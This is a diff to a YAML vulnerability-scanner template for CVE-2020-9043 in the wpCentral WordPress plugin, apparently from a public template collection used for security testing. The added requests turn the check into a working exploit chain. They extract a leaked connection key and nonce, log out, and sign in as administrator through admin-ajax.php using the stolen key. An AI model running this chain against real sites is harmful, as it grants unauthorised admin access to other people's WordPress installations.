diff --git a/cves/2020/CVE-2020-9043.yaml b/cves/2020/CVE-2020-9043.yaml index 6ddff2f9c5..9cba2f9308 100644 --- a/cves/2020/CVE-2020-9043.yaml +++ b/cves/2020/CVE-2020-9043.yaml @@ -32,19 +32,40 @@ requests: GET /wp-admin/index.php HTTP/1.1 Host: {{Hostname}} + - | + GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1 + Host: {{Hostname}} + + - | + GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1 + Host: {{Hostname}} + + redirects: true + max-redirects: 2 cookie-reuse: true req-condition: true matchers: - type: dsl dsl: - - "contains(all_headers_2, 'text/html')" - - "status_code_2 == 200" - - "contains(body_2, 'wpCentral Connection Key')" + - "contains(all_headers_4, 'text/html')" + - "status_code_4 == 200" + - "contains(body_4, 'wpCentral Connection Key')" + - contains(body_4, "pagenow = \'dashboard\'") condition: and extractors: - type: regex + name: authkey part: body group: 1 regex: - 'style="word-wrap:break-word;">([a-z0-9]+)' + internal: true + + - type: regex + name: nonce + part: body + group: 1 + regex: + - '_wpnonce=([0-9a-z]+)' + internal: true